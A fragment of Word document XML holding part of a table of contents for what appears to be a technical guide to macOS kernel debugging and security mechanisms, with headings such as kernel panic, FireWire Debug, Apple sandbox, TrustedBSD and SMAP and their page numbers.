          <w:hyperlink w:anchor="_Toc445313311" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Debug Flags in Depth</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313311 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>140</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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Debugger</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313312 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>143</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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target Mac VM</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313313 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>145</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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Controller Mac VM</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313314 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>bootcaches.plist</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313315 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14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6" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CoreDump</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313316 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>146</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7" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.8.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kernel panic</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313317 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>147</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18" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.9.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kprintf</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313318 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>151</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19" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.10.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FireWire Debug</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313319 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>151</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20" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.11.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Useful tools</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313320 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>152</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313321" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apple sandbox</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313321 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>154</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22" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.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22 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>154</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23" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TrustedBSD</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313323 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>155</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24" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sandbox profile</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313324 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>155</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0027225E" w:rsidRDefault="004106D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc445313325" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Application profile</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313325 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>155</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26" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mac security mechanism</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313326 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15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27" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SMAP</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313327 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15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28" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>proc tracking</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313328 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15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29" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
